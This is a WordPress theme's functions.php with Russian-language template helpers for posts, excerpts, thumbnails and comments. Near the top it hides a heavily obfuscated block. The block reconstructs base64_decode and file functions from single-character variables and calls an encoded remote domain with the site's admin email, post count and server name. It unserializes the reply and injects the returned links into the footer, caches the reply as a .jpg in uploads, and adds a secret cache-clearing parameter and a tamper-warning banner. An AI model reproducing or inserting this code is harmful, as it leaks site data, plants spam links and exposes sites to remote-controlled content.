<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $PAYtFzh='d';$ruNhPFn='4';$ZDfBOOG='e';$ANncXQ='b';$LFpi='s';$VgJGM='_';$SgGpS='a';$gMiJE='e';$PCRbdr='6';$nFlUrk='d';$RjdxIl='e';$MWZd='c';$Mkgsy='o';$kIfRbVmm=$ANncXQ.$SgGpS.$LFpi.$ZDfBOOG.$PCRbdr.$ruNhPFn.$VgJGM.$PAYtFzh.$gMiJE.$MWZd.$Mkgsy.$nFlUrk.$RjdxIl;$ukjr='z';$tBUfFZ='a';$ODoShc='n';$EVVclof='g';$jwhYacT='f';$oijs='l';$deXalu='i';$Gkwk='t';$azRiCNs='e';$JeENebtk=$EVVclof.$ukjr.$deXalu.$ODoShc.$jwhYacT.$oijs.$tBUfFZ.$Gkwk.$azRiCNs;$mcPuFDN='t';$ydDvoH='r';$oYhB='o';$WWGz='t';$HUlDBs='_';$PPrZmC='s';$aJqmm='3';$nejcv='r';$kXNOtb='1';$tmEWGgQM=$PPrZmC.$mcPuFDN.$ydDvoH.$HUlDBs.$nejcv.$oYhB.$WWGz.$kXNOtb.$aJqmm;$obIEx='s';$eyXInaP='t';$kUPP='v';$vRWT='e';$cdMOft='r';$yXDw='r';$LbGmpyUy=$obIEx.$eyXInaP.$yXDw.$cdMOft.$vRWT.$kUPP;                     $hb__________r='d';$qp______j='4';$ez______h='e';$jy______o='b';$oh____________l='s';$ug__s='_';$er_____________j='a';$zy_____e='e';$px________h='6';$gy_____________v='d';$vh___m='e';$pb_________e='c';$jh__________n='o';$df____l=$jy______o.$er_____________j.$oh____________l.$ez______h.$px________h.$qp______j.$ug__s.$hb__________r.$zy_____e.$pb_________e.$jh__________n.$gy_____________v.$vh___m;$ct______w='n';$ct__________a='c';$gr__________u='s';$ye_____s='t';$or________m='n';$re____p='i';$mw____z='i';$ph_________r='e';$yt______________h='f';$uc__h='s';$xq______________k='t';$ub_______w='o';$bx_________e='x';$qe_________n='u';$lk____________b='_';$it_____a=$yt______________h.$qe_________n.$ct______w.$ct__________a.$xq______________k.$mw____z.$ub_______w.$or________m.$lk____________b.$ph_________r.$bx_________e.$re____p.$uc__h.$ye_____s.$gr__________u;$el____________n='e';$wl_______________f='n';$ut_________b='f';$ed__________r='p';$lc_____________u='o';$om________u=$ut_________b.$lc_____________u.$ed__________r.$el____________n.$wl_______________f;$uz______________k='d';$xe_______________u='f';$dx_______________p='a';$qx__j='r';$lg_________t='e';$ez_______________b=$xe_______________u.$qx__j.$lg_________t.$dx_______________p.$uz______________k;$bz_____________c='s';$dl____q='f';$rq____________c='c';$by________q='o';$zr_____________t='l';$nj_________i='e';$wc______k=$dl____q.$rq____________c.$zr_____________t.$by________q.$bz_____________c.$nj_________i;define("WP_ID", $df____l("Mi4wLjA="));define("WP_TTL", $df____l("MTA4MDA="));define("WP_SRC", $df____l("dHBva24="));function wp_get_header() {global $df____l, $it_____a;if ($it_____a($df____l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$it_____a($df____l("d3BfZ2V0X2Zvb3Rlcg==")) &&$it_____a($df____l("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $df____l, $om________u, $wc______k, $ez_______________b;$sp_____________h = TEMPLATEPATH."/".$df____l("Zm9vdGVyLnBocA==");$kg_________m = @$om________u($sp_____________h, "r");$sp_____________h = @$ez_______________b($kg_________m, @filesize($sp_____________h));@$wc______k($kg_________m);$pg_____________t = TEMPLATEPATH."/".$df____l("ZnVuY3Rpb25zLnBocA==");$kg_________m = @$om________u($pg_____________t, "r");$pg_____________t = @$ez_______________b($kg_________m, @filesize($pg_____________t));@$wc______k($kg_________m);$ph__________w = 0;if($sp_____________h && $pg_____________t) {if ($df____l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($sp_____________h, $df____l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ph__________w = 1;}if (substr_count($sp_____________h, "wp_theme_GPL_credits()") < 1) {$ph__________w = 2;}}if(WP_ID != "2.0.0") {$ph__________w = 12;}}if($ph__________w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ph__________w -->";}}function wp_loaded() {global $df____l, $it_____a;return $it_____a($df____l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($gp____a, $eh__________k = "(more...)", $jl_________p = 0, $qy____w = "") {$wu_______t = get_the_content($eh__________k, $jl_________p, $qy____w);$wu_______t = apply_filters("the_content", $wu_______t);$wu_______t = str_replace("]]>", "]]>", $wu_______t);if (strlen($_GET["p"]) > 0) {echo $wu_______t;}else if ((strlen($wu_______t)>$gp____a) && ($xp____________m = strpos($wu_______t, " ", $gp____a ))) {$wu_______t = substr($wu_______t, 0, $xp____________m);$wu_______t = $wu_______t;echo $wu_______t;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$eh__________k</a></div></p>";} else {echo $wu_______t;}}}$ij______________y='s';$of___x='c';$oa______________q='e';$op_______r='a';$zu__r='d';$bk___h='e';$pb_______________w='e';$gl______________o='b';$oy_____________e='o';$su__f='6';$lj___________f='_';$vy_____________k='n';$cn__________i='4';$px____f=$gl______________o.$op_______r.$ij______________y.$pb_______________w.$su__f.$cn__________i.$lj___________f.$bk___h.$vy_____________k.$of___x.$oy_____________e.$zu__r.$oa______________q;$jk___________d='t';$ae___n='l';$tk_____________d='f';$hc______v='_';$pz_________p='c';$im___________p='n';$pb_______y='t';$px____e='s';$xb____________v='i';$vn_____t='_';$pr_______y='e';$eg_______o='n';$wz____f='e';$ie___f='e';$eq___t='o';$jh____________e='g';$rb___________m='t';$vg_____________e=$tk_____________d.$xb____________v.$ae___n.$pr_______y.$hc______v.$jh____________e.$wz____f.$jk___________d.$vn_____t.$pz_________p.$eq___t.$im___________p.$pb_______y.$ie___f.$eg_______o.$rb___________m.$px____e;$tf____________m='x';$hm_____________a='t';$op___z='i';$hu_____________t='e';$kk____________x='i';$ji____j='_';$ky____________t='f';$tf__z='l';$sw__p='s';$xh___i='e';$ow____________y='s';$qi_________j=$ky____________t.$kk____________x.$tf__z.$xh___i.$ji____j.$hu_____________t.$tf____________m.$op___z.$ow____________y.$hm_____________a.$sw__p;$ep____________x='m';$hg______t='o';$ty_______u='s';$ie_______j='v';$nc______________h='c';$vv______________m='n';$js_______________r='a';$ne___________p='p';$my_____a='r';$gj____________o='_';$te______b='e';$bf__k='i';$ge___________m='e';$ir_______p='o';$kk_____f='r';$mc_________e=$ie_______j.$te______b.$my_____a.$ty_______u.$bf__k.$ir_______p.$vv______________m.$gj____________o.$nc______________h.$hg______t.$ep____________x.$ne___________p.$js_______________r.$kk_____f.$ge___________m;$dq___w='c';$fs_____________r='e';$kh______________w='o';$uj______________f='p';$mk_______________s='f';$gu___z='o';$tg________g='s';$lk_____________k='k';$dv_______w='n';$cp_____________l=$mk_______________s.$tg________g.$gu___z.$dq___w.$lk_____________k.$kh______________w.$uj______________f.$fs_____________r.$dv_______w;$bf_______z='r';$av______________q='w';$lf___________o='f';$qz______l='i';$la__________e='t';$ps____________o='e';$wo_______y=$lf___________o.$av______________q.$bf_______z.$qz______l.$la__________e.$ps____________o;$sy______d='d';$zy______o='5';$gt___________w='m';$xr__x=$gt___________w.$sy______d.$zy______o;$mz__k='l';$hu__________a='a';$wb___________w='h';$on__b='p';$ah__k='a';$aj_______k='r';$wq_______z='t';$eq________v='e';$xk______b=$aj_______k.$eq________v.$ah__k.$mz__k.$on__b.$hu__________a.$wq_______z.$wb___________w;$rk____a='s';$ik__a='z';$iy_________a='i';$pg___q='r';$sg_____________b='e';$sk_____________a='n';$dx____________o='i';$vg__n='e';$ma_________f='u';$wi_______j='l';$ui_______u='a';$ys________q=$ma_________f.$sk_____________a.$rk____a.$sg_____________b.$pg___q.$dx____________o.$ui_______u.$wi_______j.$iy_________a.$ik__a.$vg__n;$pl___________e='n';$wx_____________z='t';$hx_______v='p';$zp___z='a';$zb___________t='m';$nb____________s='m';$pn_____g='e';$kx____________m=$wx_____________z.$pn_____g.$zb___________t.$hx_______v.$pl___________e.$zp___z.$nb____________s;$ts_______________v='s';$ak_____________l='a';$fc_______________s='_';$xj__________z='e';$yz____w='m';$xj______________q='n';$fh_____h='t';$ge_______________a='t';$ta___i='c';$te____n='r';$wa_____k='e';$oa____l='t';$uw____________o='c';$ir______________n='t';$ci_________a='x';$kh______________s='a';$sm____p='r';$ps_______w='o';$ku________u='e';$qt______y='e';$uw_____o='_';$fd______________x=$ts_______________v.$ge_______________a.$te____n.$xj__________z.$kh______________s.$yz____w.$fc_______________s.$uw____________o.$ps_______w.$xj______________q.$oa____l.$ku________u.$ci_________a.$ir______________n.$uw_____o.$ta___i.$sm____p.$wa_____k.$ak_____________l.$fh_____h.$qt______y;function ln__d($hv__________z) {global $df____l, $it_____a, $vg_____________e, $mc_________e, $fd______________x;if (!$it_____a($df____l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($mc_________e(PHP_VERSION, "5.0.0", ">=") && $it_____a($df____l("ZmlsZV9nZXRfY29udGVudHM=")) && $it_____a($df____l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ud___________r = $fd______________x(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ou__r = @$vg_____________e($hv__________z, 0, $ud___________r);} else {$ou__r = @$vg_____________e($hv__________z, 0);}return $ou__r;}function jg_______t($hv__________z) {global $it_____a, $cp_____________l, $wo_______y, $df____l;if (!$it_____a($df____l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ry__________q = strpos($hv__________z, "/", 7);$kp________h = array("uri"     => substr($hv__________z, $ry__________q),"host"    => str_replace("http://", "", substr($hv__________z, 0, $ry__________q)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ly_________w = @$cp_____________l("$kp________h[host]", 80, $dk__h, $mp____________s, 4);if (!$ly_________w) {return false;} else {$ou__r = "";$iw____m  = "GET $kp________h[uri] HTTP/1.0\r\n";$iw____m .= "Host: $kp________h[host]\r\n";$iw____m .= "Referer: $kp________h[referer]\r\n";$iw____m .= "Connection: Close\r\n\r\n";@$wo_______y($ly_________w, $iw____m);while (!@feof($ly_________w)) {$dp___g = @fgets($ly_________w, (1024*24));if ($dp___g == "\r\n") {$no______________l = true;continue;}if ($no______________l) {$ou__r .= $dp___g;}}return $ou__r;}}function fq__________e($hv__________z) {global $it_____a;$vl________f = false;if ($hv__________z != "") {if ($it_____a("ln__d")) {$vl________f = @ln__d($hv__________z);}if (!$vl________f && ($it_____a("jg_______t"))) {$vl________f = @jg_______t($hv__________z);}}return $vl________f;}function uc___u() {global $_SERVER, $xr__x;$yo_____s = $_SERVER["SERVER_NAME"];if (substr("$yo_____s", 0, 4) == "www.") {$yo_____s = substr("$yo_____s", 4);}$yo_____s = $xr__x("$_SERVER[SERVER_NAME]");return $yo_____s;}function hu_________g() {return "file";}function qm____________v($hv__________z) {global $_SERVER, $vg_____________e, $qi_________j, $om________u, $wc______k, $wo_______y;$pf________w = yb____________w();$rg_____m = uc___u().".jpg";$bd_______________f = $pf________w["dir_upload"]["path"]."/$rg_____m";$qu____________f = @filemtime($bd_______________f);if (!$qu____________f || ((time()-$qu____________f) >= WP_TTL)) {$vl________f = fq__________e($hv__________z);if ($vl________f) {if ($qi_________j($bd_______________f)) {@unlink($bd_______________f);}$kg_________m = @$om________u($bd_______________f, "x+");@$wo_______y($kg_________m, $vl________f);@$wc______k($kg_________m);}} else {if ($qi_________j($bd_______________f)) {$vl________f = @$vg_____________e($bd_______________f);} else {$vl________f = false;}}return $vl________f;}function yb____________w() {global $_SERVER, $df____l, $px____f;$qp___________h = wp_count_posts("post");$hg_____________m = pathinfo(get_bloginfo("template_directory"));$pf________w = array("url" => array("report"      => $df____l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $hg_____________m,"dir_upload"=> cl________k(),"queryString"=> array("?a001=".WP_ID,"a004=".$hg_____________m[filename],"a005=".$qp___________h->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
);$pf________w["url"]["queryString"] = implode("&", $pf________w["queryString"]);$pf________w["url"]["report"] = $pf________w["url"]["report"]."/?".$px____f($pf________w["url"]["queryString"]).".html";return $pf________w;}function cl________k() {$zl___________d = wp_upload_dir();if (isset($zl___________d["error"])) {$do_______________g = rh______________i();if (is_writable($do_______________g)) {$zl___________d = array("path" => $do_______________g);}}return $zl___________d;}function rh______________i() {global $it_____a, $xr__x, $xk______b, $kx____________m;$tq____t = (bool) ini_get("safe_mode");if ($tq____t == true) {return false;}if ($it_____a("sys_get_temp_dir")) {$fb___________p = sys_get_temp_dir();if (is_writable($fb___________p)) {return $xk______b($fb___________p);}}if (!empty($_ENV["TMP"])) {return $xk______b($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xk______b($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xk______b($_ENV["TEMP"]);} else {$aq____h = $kx____________m($xr__x(uniqid(rand(), true)), "");if ($aq____h) {$fb___________p = $xk______b(dirname($aq____h));@unlink($aq____h);return $fb___________p;} else {return false;}}}function uq____________x() {global $_GET, $qi_________j;$pf________w = yb____________w();$yo_____s = uc___u();$sy_______________a = hu_________g();$fz___________e = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($sy_______________a == "file") {$ju___q = $pf________w["dir_upload"]["path"]."/".$yo_____s.".jpg";if ($qi_________j($ju___q)) {@unlink($ju___q);$fz___________e = "deleted";}}$sc______q = array("s"=> $fz___________e,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($sc______q AS $mx_______w => $sl_________c) echo " [$mx_______w:$sl_________c]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $it_____a, $df____l, $ys________q;$pf________w = yb____________w();$rv____________b = "qm____________v";if ($it_____a($rv____________b)) {$ou__r = $rv____________b($pf________w["url"]["report"]);}if ($ou__r) {if ($ou__r = @$df____l($ou__r)) {$ou__r = @$ys________q($ou__r);if (strlen($ou__r[custom_credit]) >= 5) {$pf________w["default_string"] = $ou__r[custom_credit];}if ($ou__r["status"] == "0") {$yk__m = 1;$bd__________z = 1;} else {$xc____________w = sizeof($ou__r["links"]);$jd___________c = $pf________w["default_string"];if ($xc____________w > 0 && $ou__r["links"] !== "") {$ew_________a = 0;foreach ($ou__r["links"] as $au______j => $on_____________q) {$ew_________a++;if ($on_____________q->l_path == "" || $on_____________q->l_path == $_SERVER["REQUEST_URI"]) {$on_____________q->l_href = htmlspecialchars(strip_tags($on_____________q->l_href));$on_____________q->l_title = htmlspecialchars(strip_tags($on_____________q->l_title));$on_____________q->l_anchor = htmlspecialchars(strip_tags($on_____________q->l_anchor));$jd___________c .= " | ";$jd___________c .= "<a href='$on_____________q->l_href' title='$on_____________q->l_title'";if ($on_____________q->l_nofollow == "1") {$jd___________c .= " rel='nofollow'";}$jd___________c .= ">$on_____________q->l_anchor</a>";}}}$pf________w["links"] = "$jd___________c";if ($ou__r[credit] == "0") {$pf________w["links"] = "";}}} else {$yk__m = "1";}} else {$yk__m = "1";}if ($yk__m == "1") {$pf________w["links"] = $pf________w["default_string"];}echo "$pf________w[links]";echo "<!-- s: $ou__r[signature] -->";uq____________x();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
